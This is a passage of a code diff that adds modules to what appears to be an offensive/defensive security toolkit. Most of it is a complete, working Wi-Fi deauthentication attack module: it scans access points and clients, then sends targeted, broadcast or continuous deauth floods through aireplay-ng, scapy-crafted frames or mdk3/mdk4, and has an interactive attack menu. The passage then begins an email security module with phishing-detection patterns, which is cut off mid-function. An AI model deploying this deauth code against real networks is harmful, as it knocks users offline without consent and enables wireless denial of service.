'set', interface, 'down'], + capture_output=True, timeout=5 + ) + result = subprocess.run( + [self.iw, 'dev', interface, 'set', 'type', 'monitor'], + capture_output=True, text=True, timeout=5 + ) + subprocess.run( + [self.ip_cmd, 'link', 'set', interface, 'up'], + capture_output=True, timeout=5 + ) + if result.returncode == 0: + return { + 'ok': True, + 'interface': interface, + 'message': f'Monitor mode enabled on {interface} (via iw)' + } + return {'ok': False, 'error': result.stderr.strip() or 'iw set monitor failed'} + except Exception as e: + return {'ok': False, 'error': f'iw failed: {e}'} + + return {'ok': False, 'error': 'No tool available (need airmon-ng or iw+ip)'} + + def disable_monitor(self, interface: str) -> Dict: + """Restore interface to managed mode.""" + if not interface: + return {'ok': False, 'error': 'No interface specified'} + + # Try airmon-ng + if self.airmon: + try: + result = subprocess.run( + [self.airmon, 'stop', interface], + capture_output=True, text=True, timeout=15 + ) + output = result.stdout + result.stderr + managed_match = re.search( + r'\(monitor mode disabled(?: on)? (\w+)\)', output + ) + managed_name = managed_match.group(1) if managed_match else interface.replace('mon', '') + return { + 'ok': True, + 'interface': managed_name, + 'message': f'Managed mode restored on {managed_name}' + } + except Exception as e: + return {'ok': False, 'error': f'airmon-ng stop failed: {e}'} + + # Fallback: iw + if self.iw and self.ip_cmd: + try: + subprocess.run( + [self.ip_cmd, 'link', 'set', interface, 'down'], + capture_output=True, timeout=5 + ) + result = subprocess.run( + [self.iw, 'dev', interface, 'set', 'type', 'managed'], + capture_output=True, text=True, timeout=5 + ) + subprocess.run( + [self.ip_cmd, 'link', 'set', interface, 'up'], + capture_output=True, timeout=5 + ) + if result.returncode == 0: + return { + 'ok': True, + 'interface': interface, + 'message': f'Managed mode restored on {interface}' + } + return {'ok': False, 'error': result.stderr.strip() or 'iw set managed failed'} + except Exception as e: + return {'ok': False, 'error': f'iw failed: {e}'} + + return {'ok': False, 'error': 'No tool available'} + + # ── Scanning ───────────────────────────────────────────────────────── + + def scan_networks(self, interface: str, duration: int = 10) -> List[Dict]: + """Passive scan for access points. + + Uses airodump-ng CSV output or scapy sniffing. + Returns list of dicts: bssid, ssid, channel, encryption, signal, clients_count. + """ + if not interface: + return [] + + networks = [] + + # Method 1: airodump-ng + if self.airodump: + tmp_prefix = os.path.join(self.data_dir, f'scan_{int(time.time())}') + try: + proc = subprocess.Popen( + [self.airodump, '--write', tmp_prefix, + '--output-format', 'csv', '--write-interval', '1', + interface], + stdout=subprocess.DEVNULL, + stderr=subprocess.DEVNULL + ) + time.sleep(min(duration, 120)) + proc.terminate() + try: + proc.wait(timeout=5) + except subprocess.TimeoutExpired: + proc.kill() + + # Parse CSV + csv_path = f'{tmp_prefix}-01.csv' + if os.path.isfile(csv_path): + networks = self._parse_airodump_csv(csv_path) + # Clean up temp files + for f in Path(self.data_dir).glob( + f'scan_{os.path.basename(tmp_prefix).replace("scan_", "")}*' + ): + try: + f.unlink() + except Exception: + pass + except Exception: + pass + + # Method 2: scapy fallback + if not networks and self._scapy: + networks = self._scan_scapy(interface, duration) + + return networks + + def _parse_airodump_csv(self, csv_path: str) -> List[Dict]: + """Parse airodump-ng CSV output into network list.""" + networks = [] + clients_map: Dict[str, int] = {} + section = 'ap' + + try: + with open(csv_path, 'r', errors='ignore') as f: + for line in f: + line = line.strip() + if not line: + continue + if line.startswith('Station MAC'): + section = 'client' + continue + if line.startswith('BSSID') or line.startswith('\x00'): + continue + + parts = [p.strip() for p in line.split(',')] + + if section == 'ap' and len(parts) >= 14: + bssid = parts[0] + if not _validate_mac(bssid): + continue + channel = 0 + try: + channel = int(parts[3]) + except (ValueError, IndexError): + pass + signal = -100 + try: + signal = int(parts[8]) + except (ValueError, IndexError): + pass + encryption = parts[5] if len(parts) > 5 else '' + ssid = parts[13] if len(parts) > 13 else '' + networks.append({ + 'bssid': bssid, + 'ssid': ssid, + 'channel': channel, + 'encryption': encryption, + 'signal': signal, + 'clients_count': 0 + }) + + elif section == 'client' and len(parts) >= 6: + client_mac = parts[0] + ap_bssid = parts[5] if len(parts) > 5 else '' + if _validate_mac(ap_bssid): + clients_map[ap_bssid] = clients_map.get(ap_bssid, 0) + 1 + + # Merge client counts + for net in networks: + net['clients_count'] = clients_map.get(net['bssid'], 0) + + except Exception: + pass + + return networks + + def _scan_scapy(self, interface: str, duration: int) -> List[Dict]: + """Scan using scapy beacon sniffing.""" + networks = {} + try: + from scapy.all import Dot11, Dot11Beacon, Dot11Elt, sniff + + def handler(pkt): + if pkt.haslayer(Dot11Beacon): + bssid = pkt[Dot11].addr2 + if not bssid or bssid in networks: + return + ssid = '' + channel = 0 + enc = 'OPEN' + elt = pkt[Dot11Elt] + while elt: + if elt.ID == 0: # SSID + try: + ssid = elt.info.decode('utf-8', errors='replace') + except Exception: + ssid = '' + elif elt.ID == 3: # DS Parameter Set (channel) + try: + channel = int(elt.info[0]) + except Exception: + pass + elt = elt.payload.getlayer(Dot11Elt) + + cap = pkt.sprintf('{Dot11Beacon:%Dot11Beacon.cap%}') + if 'privacy' in cap: + enc = 'WPA/WPA2' + + try: + sig = -(256 - ord(pkt.notdecoded[-4:-3])) + except Exception: + sig = -100 + + networks[bssid] = { + 'bssid': bssid, + 'ssid': ssid, + 'channel': channel, + 'encryption': enc, + 'signal': sig, + 'clients_count': 0 + } + + sniff(iface=interface, prn=handler, timeout=duration, store=False) + except Exception: + pass + + return list(networks.values()) + + def scan_clients(self, interface: str, target_bssid: Optional[str] = None, + duration: int = 10) -> List[Dict]: + """Discover client-AP associations. + + Returns list of dicts: client_mac, ap_bssid, ap_ssid, signal, packets. + """ + if not interface: + return [] + + clients = [] + + # Method 1: airodump-ng with optional BSSID filter + if self.airodump: + tmp_prefix = os.path.join(self.data_dir, f'clients_{int(time.time())}') + cmd = [ + self.airodump, '--write', tmp_prefix, + '--output-format', 'csv', '--write-interval', '1' + ] + if target_bssid and _validate_mac(target_bssid): + cmd += ['--bssid', target_bssid] + cmd.append(interface) + + try: + proc = subprocess.Popen( + cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL + ) + time.sleep(min(duration, 120)) + proc.terminate() + try: + proc.wait(timeout=5) + except subprocess.TimeoutExpired: + proc.kill() + + csv_path = f'{tmp_prefix}-01.csv' + if os.path.isfile(csv_path): + clients = self._parse_clients_csv(csv_path, target_bssid) + for f in Path(self.data_dir).glob( + f'clients_{os.path.basename(tmp_prefix).replace("clients_", "")}*' + ): + try: + f.unlink() + except Exception: + pass + except Exception: + pass + + # Method 2: scapy fallback + if not clients and self._scapy: + clients = self._scan_clients_scapy(interface, target_bssid, duration) + + return clients + + def _parse_clients_csv(self, csv_path: str, + target_bssid: Optional[str] = None) -> List[Dict]: + """Parse airodump CSV for client associations.""" + clients = [] + ap_names: Dict[str, str] = {} + section = 'ap' + + try: + with open(csv_path, 'r', errors='ignore') as f: + for line in f: + line = line.strip() + if not line: + continue + if line.startswith('Station MAC'): + section = 'client' + continue + if line.startswith('BSSID'): + continue + + parts = [p.strip() for p in line.split(',')] + + if section == 'ap' and len(parts) >= 14: + bssid = parts[0] + ssid = parts[13] if len(parts) > 13 else '' + if _validate_mac(bssid): + ap_names[bssid] = ssid + + elif section == 'client' and len(parts) >= 6: + client_mac = parts[0] + if not _validate_mac(client_mac): + continue + ap_bssid = parts[5] if len(parts) > 5 else '' + if not _validate_mac(ap_bssid): + continue + if target_bssid and ap_bssid.upper() != target_bssid.upper(): + continue + + signal = -100 + try: + signal = int(parts[3]) + except (ValueError, IndexError): + pass + packets = 0 + try: + packets = int(parts[4]) + except (ValueError, IndexError): + pass + + clients.append({ + 'client_mac': client_mac, + 'ap_bssid': ap_bssid, + 'ap_ssid': ap_names.get(ap_bssid, ''), + 'signal': signal, + 'packets': packets + }) + except Exception: + pass + + return clients + + def _scan_clients_scapy(self, interface: str, + target_bssid: Optional[str], + duration: int) -> List[Dict]: + """Discover clients using scapy.""" + seen: Dict[str, Dict] = {} + try: + from scapy.all import Dot11, sniff + + def handler(pkt): + if not pkt.haslayer(Dot11): + return + d11 = pkt[Dot11] + # Data or management frames — addr1=dest, addr2=src, addr3=bssid + src = d11.addr2 + dst = d11.addr1 + bssid = d11.addr3 + if not src or not bssid: + return + if src == bssid or src == BROADCAST.lower(): + return + if target_bssid and bssid.upper() != target_bssid.upper(): + return + key = f'{src}_{bssid}' + if key not in seen: + seen[key] = { + 'client_mac': src, + 'ap_bssid': bssid, + 'ap_ssid': '', + 'signal': -100, + 'packets': 0 + } + seen[key]['packets'] += 1 + + sniff(iface=interface, prn=handler, timeout=duration, store=False) + except Exception: + pass + + return list(seen.values()) + + # ── Deauthentication Attacks ───────────────────────────────────────── + + def deauth_targeted(self, interface: str, target_bssid: str, + client_mac: str, count: int = 10, + interval: float = 0.1) -> Dict: + """Send deauth frames to a specific client on a specific AP. + + Uses aireplay-ng or scapy Dot11Deauth as fallback. + Returns stats dict. + """ + if not _validate_mac(target_bssid): + return {'ok': False, 'error': 'Invalid target BSSID'} + if not _validate_mac(client_mac): + return {'ok': False, 'error': 'Invalid client MAC'} + count = max(1, min(count, 99999)) + + start_ts = time.time() + frames_sent = 0 + + # Method 1: aireplay-ng + if self.aireplay: + try: + result = subprocess.run( + [self.aireplay, '-0', str(count), + '-a', target_bssid, '-c', client_mac, interface], + capture_output=True, text=True, + timeout=max(30, count * interval * 2 + 10) + ) + output = result.stdout + result.stderr + sent_match = re.search(r'(\d+)\s+(?:ACKs|packets)', output) + if sent_match: + frames_sent = int(sent_match.group(1)) + else: + frames_sent = count + except subprocess.TimeoutExpired: + frames_sent = count + except Exception as e: + return {'ok': False, 'error': f'aireplay-ng failed: {e}'} + + # Method 2: scapy + elif self._scapy: + frames_sent = self._deauth_scapy( + interface, target_bssid, client_mac, count, interval + ) + + # Method 3: mdk4 / mdk3 + elif self.mdk4 or self.mdk3: + tool = self.mdk4 or self.mdk3 + frames_sent = self._deauth_mdk( + tool, interface, target_bssid, client_mac, count + ) + else: + return {'ok': False, 'error': 'No deauth tool available (need aireplay-ng, scapy, or mdk3/mdk4)'} + + elapsed = round(time.time() - start_ts, 2) + record = { + 'timestamp': datetime.now().isoformat(), + 'target_bssid': target_bssid, + 'client_mac': client_mac, + 'mode': 'targeted', + 'count': count, + 'frames_sent': frames_sent, + 'duration': elapsed, + 'interface': interface + } + self._add_history(record) + + return { + 'ok': True, + 'mode': 'targeted', + 'target_bssid': target_bssid, + 'client_mac': client_mac, + 'frames_sent': frames_sent, + 'duration': elapsed + } + + def deauth_broadcast(self, interface: str, target_bssid: str, + count: int = 10, interval: float = 0.1) -> Dict: + """Broadcast deauth to all clients on an AP.""" + return self.deauth_targeted( + interface, target_bssid, BROADCAST, count, interval + ) + + def deauth_multi(self, interface: str, targets: List[Dict], + count: int = 10, interval: float = 0.1) -> Dict: + """Deauth multiple AP/client pairs. + + targets: list of {bssid, client_mac} + """ + if not targets: + return {'ok': False, 'error': 'No targets specified'} + + results = [] + total_frames = 0 + + for t in targets: + bssid = t.get('bssid', '') + client = t.get('client_mac', BROADCAST) + if not client: + client = BROADCAST + r = self.deauth_targeted(interface, bssid, client, count, interval) + results.append(r) + if r.get('ok'): + total_frames += r.get('frames_sent', 0) + + return { + 'ok': True, + 'mode': 'multi', + 'targets_count': len(targets), + 'total_frames': total_frames, + 'results': results + } + + def _deauth_scapy(self, interface: str, bssid: str, client: str, + count: int, interval: float) -> int: + """Send deauth using scapy.""" + frames_sent = 0 + try: + from scapy.all import Dot11, Dot11Deauth, RadioTap, sendp + + # Deauth from AP to client + pkt_ap = (RadioTap() / + Dot11(addr1=client, addr2=bssid, addr3=bssid) / + Dot11Deauth(reason=7)) + # Deauth from client to AP + pkt_cl = (RadioTap() / + Dot11(addr1=bssid, addr2=client, addr3=bssid) / + Dot11Deauth(reason=7)) + + for _ in range(count): + sendp(pkt_ap, iface=interface, count=1, verbose=False) + sendp(pkt_cl, iface=interface, count=1, verbose=False) + frames_sent += 2 + if interval > 0: + time.sleep(interval) + + except Exception: + pass + return frames_sent + + def _deauth_mdk(self, tool: str, interface: str, bssid: str, + client: str, count: int) -> int: + """Send deauth using mdk3/mdk4.""" + # Create a target file for mdk + target_file = os.path.join(self.data_dir, 'mdk_targets.txt') + try: + with open(target_file, 'w') as f: + f.write(f'{bssid}\n') + + result = subprocess.run( + [tool, interface, 'd', '-b', target_file, '-c', str(count)], + capture_output=True, text=True, timeout=max(30, count + 10) + ) + return count # mdk does not reliably report frame count + except Exception: + return 0 + finally: + try: + os.unlink(target_file) + except Exception: + pass + + # ── Continuous Mode ────────────────────────────────────────────────── + + def start_continuous(self, interface: str, target_bssid: str, + client_mac: Optional[str] = None, + interval: float = 0.5, + burst: int = 5) -> Dict: + """Start continuous deauth in a background thread. + + Sends `burst` deauth frames every `interval` seconds. + """ + if self._continuous_running: + return {'ok': False, 'error': 'Continuous attack already running'} + if not _validate_mac(target_bssid): + return {'ok': False, 'error': 'Invalid target BSSID'} + if client_mac and not _validate_mac(client_mac): + return {'ok': False, 'error': 'Invalid client MAC'} + + client = client_mac or BROADCAST + interval = max(0.05, min(interval, 60.0)) + burst = max(1, min(burst, 1000)) + + self._continuous_running = True + self._continuous_frames_sent = 0 + self._continuous_start_time = time.time() + self._continuous_target = { + 'interface': interface, + 'target_bssid': target_bssid, + 'client_mac': client, + 'interval': interval, + 'burst': burst + } + + def _worker(): + while self._continuous_running: + r = self.deauth_targeted( + interface, target_bssid, client, burst, 0 + ) + if r.get('ok'): + self._continuous_frames_sent += r.get('frames_sent', 0) + time.sleep(interval) + + self._continuous_thread = threading.Thread( + target=_worker, daemon=True, name='deauth-continuous' + ) + self._continuous_thread.start() + + return { + 'ok': True, + 'message': f'Continuous deauth started against {target_bssid}', + 'mode': 'broadcast' if client == BROADCAST else 'targeted' + } + + def stop_continuous(self) -> Dict: + """Stop continuous deauth attack.""" + if not self._continuous_running: + return {'ok': False, 'error': 'No continuous attack running'} + + self._continuous_running = False + if self._continuous_thread: + self._continuous_thread.join(timeout=5) + self._continuous_thread = None + + elapsed = round(time.time() - self._continuous_start_time, 2) + frames = self._continuous_frames_sent + + record = { + 'timestamp': datetime.now().isoformat(), + 'target_bssid': self._continuous_target.get('target_bssid', ''), + 'client_mac': self._continuous_target.get('client_mac', ''), + 'mode': 'continuous', + 'count': frames, + 'frames_sent': frames, + 'duration': elapsed, + 'interface': self._continuous_target.get('interface', '') + } + self._add_history(record) + + return { + 'ok': True, + 'message': 'Continuous attack stopped', + 'frames_sent': frames, + 'duration': elapsed + } + + def is_attacking(self) -> bool: + """Check if continuous attack is running.""" + return self._continuous_running + + def get_attack_status(self) -> Dict: + """Return current attack state.""" + if not self._continuous_running: + return { + 'running': False, + 'target_bssid': '', + 'client_mac': '', + 'frames_sent': 0, + 'duration': 0, + 'mode': 'idle' + } + + elapsed = round(time.time() - self._continuous_start_time, 2) + client = self._continuous_target.get('client_mac', BROADCAST) + mode = 'broadcast' if client == BROADCAST else 'targeted' + + return { + 'running': True, + 'target_bssid': self._continuous_target.get('target_bssid', ''), + 'client_mac': client, + 'frames_sent': self._continuous_frames_sent, + 'duration': elapsed, + 'mode': mode, + 'interval': self._continuous_target.get('interval', 0), + 'burst': self._continuous_target.get('burst', 0) + } + + # ── Channel Control ────────────────────────────────────────────────── + + def set_channel(self, interface: str, channel: int) -> Dict: + """Set interface to a specific wireless channel.""" + channel = max(1, min(channel, 196)) + + if self.iw: + ok, out = _run([self.iw, 'dev', interface, 'set', 'channel', str(channel)]) + if ok: + self._current_channel = channel + return {'ok': True, 'channel': channel, 'message': f'Set channel {channel}'} + return {'ok': False, 'error': out or f'Failed to set channel {channel}'} + + if self.iwconfig: + ok, out = _run([self.iwconfig, interface, 'channel', str(channel)]) + if ok: + self._current_channel = channel + return {'ok': True, 'channel': channel, 'message': f'Set channel {channel}'} + return {'ok': False, 'error': out or f'Failed to set channel {channel}'} + + return {'ok': False, 'error': 'No tool available (need iw or iwconfig)'} + + def channel_hop(self, interface: str, channels: Optional[List[int]] = None, + dwell: float = 0.5) -> Dict: + """Start channel hopping in a background thread. + + Default channels: 1-14 (2.4 GHz). + """ + if self._hop_running: + return {'ok': False, 'error': 'Channel hopping already active'} + if not interface: + return {'ok': False, 'error': 'No interface specified'} + + if not channels: + channels = list(range(1, 15)) + dwell = max(0.1, min(dwell, 30.0)) + + self._hop_running = True + + def _hop_worker(): + idx = 0 + while self._hop_running: + ch = channels[idx % len(channels)] + self.set_channel(interface, ch) + idx += 1 + time.sleep(dwell) + + self._hop_thread = threading.Thread( + target=_hop_worker, daemon=True, name='deauth-channel-hop' + ) + self._hop_thread.start() + + return { + 'ok': True, + 'message': f'Channel hopping started on {interface}', + 'channels': channels, + 'dwell': dwell + } + + def stop_channel_hop(self) -> Dict: + """Stop channel hopping.""" + if not self._hop_running: + return {'ok': False, 'error': 'Channel hopping not active'} + + self._hop_running = False + if self._hop_thread: + self._hop_thread.join(timeout=5) + self._hop_thread = None + + return {'ok': True, 'message': 'Channel hopping stopped'} + + # ── History ────────────────────────────────────────────────────────── + + def get_attack_history(self) -> List[Dict]: + """Return past attacks with timestamps and stats.""" + return list(self._history) + + def clear_history(self) -> Dict: + """Clear attack history.""" + self._history = [] + self._save_history() + return {'ok': True, 'message': 'History cleared'} + + def _add_history(self, record: Dict): + """Append an attack record and persist.""" + self._history.append(record) + # Keep last 500 entries + if len(self._history) > 500: + self._history = self._history[-500:] + self._save_history() + + def _load_history(self): + """Load history from disk.""" + try: + if os.path.isfile(self.history_path): + with open(self.history_path, 'r') as f: + self._history = json.load(f) + except Exception: + self._history = [] + + def _save_history(self): + """Persist history to disk.""" + try: + with open(self.history_path, 'w') as f: + json.dump(self._history, f, indent=2) + except Exception: + pass + + # ── CLI Runner ─────────────────────────────────────────────────────── + + def print_status(self, message: str, status: str = "info"): + colors = { + "info": Colors.CYAN, "success": Colors.GREEN, + "warning": Colors.YELLOW, "error": Colors.RED + } + symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"} + print(f"{colors.get(status, Colors.WHITE)}" + f"[{symbols.get(status, '*')}] {message}{Colors.RESET}") + + +def run(): + """CLI entry point for the deauth module.""" + clear_screen() + display_banner() + deauth = get_deauth() + + # Show tool status + tools = deauth.get_tools_status() + available = [k for k, v in tools.items() if v] + missing = [k for k, v in tools.items() if not v] + deauth.print_status(f"Available tools: {', '.join(available) if available else 'none'}", "info") + if missing: + deauth.print_status(f"Missing tools: {', '.join(missing)}", "warning") + print() + + selected_iface = None + selected_bssid = None + selected_client = None + + while True: + print(f"\n{Colors.BOLD}{Colors.RED}=== Deauth Attack ==={Colors.RESET}") + print(f" Interface: {Colors.CYAN}{selected_iface or 'none'}{Colors.RESET}") + print(f" Target AP: {Colors.CYAN}{selected_bssid or 'none'}{Colors.RESET}") + print(f" Client: {Colors.CYAN}{selected_client or 'broadcast'}{Colors.RESET}") + if deauth.is_attacking(): + status = deauth.get_attack_status() + print(f" {Colors.RED}[ATTACKING]{Colors.RESET} " + f"{status['frames_sent']} frames / {status['duration']}s") + print() + print(f" {Colors.GREEN}1{Colors.RESET} - Select Interface") + print(f" {Colors.GREEN}2{Colors.RESET} - Scan Networks") + print(f" {Colors.GREEN}3{Colors.RESET} - Scan Clients") + print(f" {Colors.GREEN}4{Colors.RESET} - Targeted Deauth") + print(f" {Colors.GREEN}5{Colors.RESET} - Broadcast Deauth") + print(f" {Colors.GREEN}6{Colors.RESET} - Continuous Mode") + print(f" {Colors.GREEN}7{Colors.RESET} - Stop Attack") + print(f" {Colors.GREEN}8{Colors.RESET} - Set Channel") + print(f" {Colors.GREEN}0{Colors.RESET} - Back") + print() + + choice = input(f"{Colors.BOLD}Choice > {Colors.RESET}").strip() + + if choice == '0': + if deauth.is_attacking(): + deauth.stop_continuous() + deauth.print_status("Stopped continuous attack", "warning") + break + + elif choice == '1': + ifaces = deauth.get_interfaces() + if not ifaces: + deauth.print_status("No wireless interfaces found", "error") + continue + print(f"\n{'#':<4} {'Interface':<15} {'Mode':<12} {'Channel':<8} {'MAC'}") + for i, ifc in enumerate(ifaces): + print(f"{i+1:<4} {ifc['name']:<15} {ifc['mode']:<12} " + f"{ifc['channel']:<8} {ifc['mac']}") + sel = input(f"\nSelect interface (1-{len(ifaces)}): ").strip() + try: + idx = int(sel) - 1 + if 0 <= idx < len(ifaces): + selected_iface = ifaces[idx]['name'] + deauth.print_status(f"Selected: {selected_iface}", "success") + if ifaces[idx]['mode'] != 'monitor': + en = input("Enable monitor mode? (y/n): ").strip().lower() + if en == 'y': + r = deauth.enable_monitor(selected_iface) + if r['ok']: + selected_iface = r['interface'] + deauth.print_status(r['message'], "success") + else: + deauth.print_status(r['error'], "error") + except ValueError: + pass + + elif choice == '2': + if not selected_iface: + deauth.print_status("Select an interface first", "warning") + continue + dur = input("Scan duration (seconds) [10]: ").strip() + dur = int(dur) if dur.isdigit() else 10 + deauth.print_status(f"Scanning for {dur}s on {selected_iface}...", "info") + nets = deauth.scan_networks(selected_iface, dur) + if not nets: + deauth.print_status("No networks found", "warning") + continue + print(f"\n{'#':<4} {'BSSID':<20} {'SSID':<25} {'CH':<5} " + f"{'Enc':<12} {'Sig':<6} {'Clients'}") + for i, n in enumerate(nets): + print(f"{i+1:<4} {n['bssid']:<20} {n['ssid']:<25} " + f"{n['channel']:<5} {n['encryption']:<12} " + f"{n['signal']:<6} {n['clients_count']}") + sel = input(f"\nSelect target AP (1-{len(nets)}, Enter to skip): ").strip() + try: + idx = int(sel) - 1 + if 0 <= idx < len(nets): + selected_bssid = nets[idx]['bssid'] + deauth.print_status( + f"Target: {nets[idx]['ssid']} ({selected_bssid})", "success" + ) + except ValueError: + pass + + elif choice == '3': + if not selected_iface: + deauth.print_status("Select an interface first", "warning") + continue + dur = input("Scan duration (seconds) [10]: ").strip() + dur = int(dur) if dur.isdigit() else 10 + deauth.print_status( + f"Scanning clients{' on ' + selected_bssid if selected_bssid else ''}...", + "info" + ) + clients = deauth.scan_clients(selected_iface, selected_bssid, dur) + if not clients: + deauth.print_status("No clients found", "warning") + continue + print(f"\n{'#':<4} {'Client MAC':<20} {'AP BSSID':<20} " + f"{'Signal':<8} {'Packets'}") + for i, c in enumerate(clients): + print(f"{i+1:<4} {c['client_mac']:<20} {c['ap_bssid']:<20} " + f"{c['signal']:<8} {c['packets']}") + sel = input(f"\nSelect client (1-{len(clients)}, Enter for broadcast): ").strip() + try: + idx = int(sel) - 1 + if 0 <= idx < len(clients): + selected_client = clients[idx]['client_mac'] + if not selected_bssid: + selected_bssid = clients[idx]['ap_bssid'] + deauth.print_status(f"Client: {selected_client}", "success") + except ValueError: + selected_client = None + + elif choice == '4': + if not selected_iface or not selected_bssid: + deauth.print_status("Select interface and target AP first", "warning") + continue + client = selected_client or input("Client MAC (Enter for broadcast): ").strip() + if not client: + client = BROADCAST + cnt = input("Frame count [10]: ").strip() + cnt = int(cnt) if cnt.isdigit() else 10 + deauth.print_status(f"Sending {cnt} deauth frames...", "info") + r = deauth.deauth_targeted(selected_iface, selected_bssid, client, cnt) + if r['ok']: + deauth.print_status( + f"Sent {r['frames_sent']} frames in {r['duration']}s", "success" + ) + else: + deauth.print_status(r['error'], "error") + + elif choice == '5': + if not selected_iface or not selected_bssid: + deauth.print_status("Select interface and target AP first", "warning") + continue + cnt = input("Frame count [10]: ").strip() + cnt = int(cnt) if cnt.isdigit() else 10 + deauth.print_status(f"Broadcasting {cnt} deauth frames...", "info") + r = deauth.deauth_broadcast(selected_iface, selected_bssid, cnt) + if r['ok']: + deauth.print_status( + f"Sent {r['frames_sent']} frames in {r['duration']}s", "success" + ) + else: + deauth.print_status(r['error'], "error") + + elif choice == '6': + if not selected_iface or not selected_bssid: + deauth.print_status("Select interface and target AP first", "warning") + continue + client = selected_client or BROADCAST + intv = input("Interval between bursts (seconds) [0.5]: ").strip() + intv = float(intv) if intv else 0.5 + bst = input("Burst size [5]: ").strip() + bst = int(bst) if bst.isdigit() else 5 + r = deauth.start_continuous( + selected_iface, selected_bssid, client, intv, bst + ) + if r['ok']: + deauth.print_status(r['message'], "success") + else: + deauth.print_status(r['error'], "error") + + elif choice == '7': + r = deauth.stop_continuous() + if r['ok']: + deauth.print_status( + f"Stopped. {r['frames_sent']} frames in {r['duration']}s", + "success" + ) + else: + deauth.print_status(r.get('error', 'No attack running'), "warning") + + elif choice == '8': + if not selected_iface: + deauth.print_status("Select an interface first", "warning") + continue + ch = input("Channel (1-196): ").strip() + try: + ch = int(ch) + r = deauth.set_channel(selected_iface, ch) + if r['ok']: + deauth.print_status(r['message'], "success") + else: + deauth.print_status(r['error'], "error") + except ValueError: + deauth.print_status("Invalid channel number", "error") + + else: + deauth.print_status("Invalid choice", "warning") diff --git a/modules/email_sec.py b/modules/email_sec.py new file mode 100644 index 0000000..27e09d2 --- /dev/null +++ b/modules/email_sec.py @@ -0,0 +1,1590 @@ +"""AUTARCH Email Security + +DMARC/SPF/DKIM analysis, email header forensics, phishing detection, +mailbox search, and abuse report generation for email security assessment. +""" + +DESCRIPTION = "Email security — DMARC, SPF, header forensics" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "defense" + +import os +import re +import sys +import json +import ssl +import time +import socket +import struct +import hashlib +import imaplib +import poplib +import email +import email.header +import email.utils +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any, Tuple +from urllib.parse import urlparse +import subprocess + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +sys.path.insert(0, str(Path(__file__).parent.parent)) +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = BLUE = GREEN = YELLOW = CYAN = WHITE = DIM = RESET = '' + def clear_screen(): pass + def display_banner(): pass + + +# -- Constants --------------------------------------------------------------- + +COMMON_DKIM_SELECTORS = [ + 'default', 'google', 'selector1', 'selector2', 'k1', 'k2', + 'dkim', 'mail', 's1', 's2', 'smtp', 'mandrill', 'everlytickey1', + 'everlytickey2', 'sig1', 'mxvault', 'a1', 'a2', 'cm', 'pm', + 'protonmail', 'protonmail2', 'protonmail3', +] + +BLACKLISTS = [ + 'zen.spamhaus.org', + 'bl.spamcop.net', + 'b.barracudacentral.org', + 'dnsbl.sorbs.net', + 'spam.dnsbl.sorbs.net', + 'dul.dnsbl.sorbs.net', + 'cbl.abuseat.org', + 'dnsbl-1.uceprotect.net', + 'psbl.surriel.com', + 'all.s5h.net', + 'rbl.interserver.net', + 'dnsbl.dronebl.org', + 'db.wpbl.info', + 'bl.mailspike.net', + 'truncate.gbudb.net', +] + +PHISHING_INDICATORS = { + 'urgency_words': { + 'patterns': [ + r'\b(urgent|immediate|action\s+required|act\s+now|expires?\s+today)\b', + r'\b(suspended|disabled|locked|compromised|unauthorized)\b', + r'\b(verify\s+your|confirm\s+your|update\s+your|validate)\b', + r'\b(within\s+24\s+hours|limited\s+time|final\s+notice|last\s+chance)\b', + ], + 'weight': 15, + }, + 'suspicious_urls': { + 'patterns': [ + r'https?://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', # IP-based URLs + r'https?://[^/]*\.(tk|ml|ga|cf|gq|xyz|top|buzz|club|work|click)\b', # suspicious TLDs + r'https?://bit\.ly|tinyurl\.com|goo\.gl|t\.co|is\.gd|shorte\.st', # shorteners + ], + 'weight': 25, + }, + 'brand_impersonation': { + 'patterns': [ + r'\b(paypal|apple|microsoft|google|amazon|facebook|netflix|bank)\b', + ], + 'weight': 10, + }, + 'dangerous_attachments': { + 'patterns': [ + r'\.(exe|scr|bat|cmd|com|pif|vbs|vbe|js|jse|wsf|wsh|ps1|msi|dll)\b', + r'\.(doc|xls|ppt)m\b', # macro-enabled Office + r'\.iso\b|\.img\b|\.hta\b', + ], + 'weight': 30, + }, + 'encoding_tricks': { + 'patterns': [ + r'xn--', # punycode + r'&#\d+;', # HTML entities numeric + r'&#x[0-9a-f]+;', # HTML entities hex + r'=\?[^?]*\?B\?', # Base64 encoded headers + ], + 'weight': 20, + }, +} + +URL_SHORTENER_DOMAINS = { + 'bit.ly', 'tinyurl.com', 'goo.gl', 't.co', 'is.gd', 'shorte.st', + 'ow.ly', 'buff.ly', 'rebrand.ly', 'cutt.ly', 'tiny.cc', 'lnkd.in', + 'rb.gy', 'v.gd', 'qr.ae', 'bl.ink', +} + +SUSPICIOUS_TLDS = { + '.tk', '.ml', '.ga', '.cf', '.gq', '.xyz', '.top', '.buzz', + '.club', '.work', '.click', '.link', '.info', '.biz', '.stream', + '.download', '.win', '.racing', '.review', '.country', '.science', +} + + +# -- Helper ------------------------------------------------------------------ + +def _dns_query(name: str, record_type: str = 'TXT', timeout: int = 5) -> List[str]: + """Query DNS records using nslookup subprocess fallback.""" + results = [] + try: + if record_type == 'TXT': + # Try socket-based approach first for basic lookups + try: + answers = socket.getaddrinfo(name, None) + # socket.getaddrinfo doesn't return TXT — fall through + except Exception: + pass + + # Use nslookup as cross-platform fallback + cmd = ['nslookup', '-type=' + record_type, name] + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout) + output = proc.stdout + proc.stderr + + # Parse TXT records from nslookup output + for line in output.split('\n'): + line = line.strip() + if '=' in line and 'text' in line.lower(): + # Format: text = "v=spf1 ..." + txt = line.split('=', 1)[1].strip().strip('"') + results.append(txt) + elif line.startswith('"') and line.endswith('"'): + results.append(line.strip('"')) + elif 'v=spf1' in line or 'v=DMARC1' in line or 'v=DKIM1' in line: + # Sometimes the record is on the line itself + match = re.search(r'"([^"]+)"', line) + if match: + results.append(match.group(1)) + elif 'v=' in line: + # Grab from v= onward + idx = line.index('v=') + results.append(line[idx:].strip().strip('"')) + + elif record_type == 'MX': + cmd = ['nslookup', '-type=MX', name] + proc = subprocess.run(cmd, 